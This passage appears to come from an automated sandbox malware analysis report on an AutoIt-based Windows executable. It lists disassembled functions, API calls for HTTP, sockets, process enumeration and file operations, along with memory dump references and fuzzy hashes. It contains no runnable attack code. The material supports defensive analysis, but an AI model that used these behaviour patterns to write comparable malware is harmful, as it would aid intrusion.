                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                              • String ID:
                                                                              • API String ID: 2014098862-0
                                                                              • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                              • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                              • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                              • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                              Function 0045427D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 259libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc_malloc$_strcat_strlen
                                                                              • String ID: AU3_FreeVar
                                                                              • API String ID: 2184576858-771828931
                                                                              • Opcode ID: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                              • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                              • Opcode Fuzzy Hash: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                              • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                              Function 00401D10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 235COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                              • DestroyWindow.USER32(?), ref: 0042A751
                                                                              • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                              • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                              • String ID: close all
                                                                              • API String ID: 4174999648-3243417748
                                                                              • Opcode ID: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                              • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                              • Opcode Fuzzy Hash: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                              • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                              Function 0044AA1F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                              • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                              • String ID:
                                                                              • API String ID: 1291720006-3916222277
                                                                              • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                              • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                              • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                              • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                              Function 0046BB59 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastselect
                                                                              • String ID: HH
                                                                              • API String ID: 215497628-2761332787
                                                                              • Opcode ID: d4dee826ad07c8790196afe3a66b02134916bcd065c8c5f95b8a7bfd3fd6b23c
                                                                              • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                              • Opcode Fuzzy Hash: d4dee826ad07c8790196afe3a66b02134916bcd065c8c5f95b8a7bfd3fd6b23c
                                                                              • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                              Function 0047D2F8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __snwprintf__wcsicoll_wcscpy
                                                                              • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                              • API String ID: 1729044348-3708979750
                                                                              • Opcode ID: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                              • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                              • Opcode Fuzzy Hash: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                              • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                              Function 0044BBC9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\r6lOHDg9N9.exe,?,C:\Users\user\Desktop\r6lOHDg9N9.exe,004A8E80,C:\Users\user\Desktop\r6lOHDg9N9.exe,0040F3D2), ref: 0040FFCA
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                              • _wcscat.LIBCMT ref: 0044BCAA
                                                                              • _wcslen.LIBCMT ref: 0044BCB7
                                                                              • _wcslen.LIBCMT ref: 0044BCCB
                                                                              • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                              • String ID: \*.*
                                                                              • API String ID: 2326526234-1173974218
                                                                              • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                              • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                              • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                              • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                              Function 004366BE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                              • _wcslen.LIBCMT ref: 004366DD
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                              • GetLastError.KERNEL32 ref: 0043670F
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                              • _wcsrchr.LIBCMT ref: 0043674C
                                                                                • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                              • String ID: \
                                                                              • API String ID: 321622961-2967466578
                                                                              • Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                              • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                              • Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                              • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                              Function 0044C80C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                              • API String ID: 1038674560-2734436370
                                                                              • Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                              • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                              • Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                              • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                              Function 0047439D Relevance: 12.3, APIs: 8, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 61459f4a8200ef3d52de203114b28894f5d4b3bd8466eb3c739413db927d5df4
                                                                              • Instruction ID: 650af14def374fe6fd11052fbef22cb8aa6c894e3601bf285572d08ae3c4fed9
                                                                              • Opcode Fuzzy Hash: 61459f4a8200ef3d52de203114b28894f5d4b3bd8466eb3c739413db927d5df4
                                                                              • Instruction Fuzzy Hash: 439192726043009BD710EF65DC82BABB3E9AFD4714F004D2EF548E7291D779E944875A
                                                                              Function 00436EC8 Relevance: 12.1, APIs: 8, Instructions: 103COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                                                                              • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                                                                              • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                                                                              • __wsplitpath.LIBCMT ref: 00436FA0
                                                                              • _wcscat.LIBCMT ref: 00436FB2
                                                                              • __wcsicoll.LIBCMT ref: 00436FC4
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2903788889-0
                                                                              • Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                              • Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
                                                                              • Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                              • Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
                                                                              Function 00441561 Relevance: 12.1, APIs: 8, Instructions: 101windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteObject.GDI32(?), ref: 0044157D
                                                                              • GetDC.USER32(00000000), ref: 00441585
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 3864802216-0
                                                                              • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                              • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                              • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                              • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                              Function 004140DB Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                              • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                              • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                              • ExitThread.KERNEL32 ref: 0041410F
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                              • __freefls@4.LIBCMT ref: 00414135
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                              • String ID:
                                                                              • API String ID: 1925773019-0
                                                                              • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                              • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                              • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                              • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                              Function 004357AD Relevance: 12.0, APIs: 8, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                              • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                              • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                              • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                              • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                              • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                              • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                              • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                              • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                              • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                              • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                              Function 00464A0E Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00464ADE
                                                                                • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                              • inet_addr.WSOCK32(?), ref: 00464B1F
                                                                              • gethostbyname.WSOCK32(?), ref: 00464B29
                                                                              • _memset.LIBCMT ref: 00464B92
                                                                              • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                              • WSACleanup.WSOCK32 ref: 00464CE4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
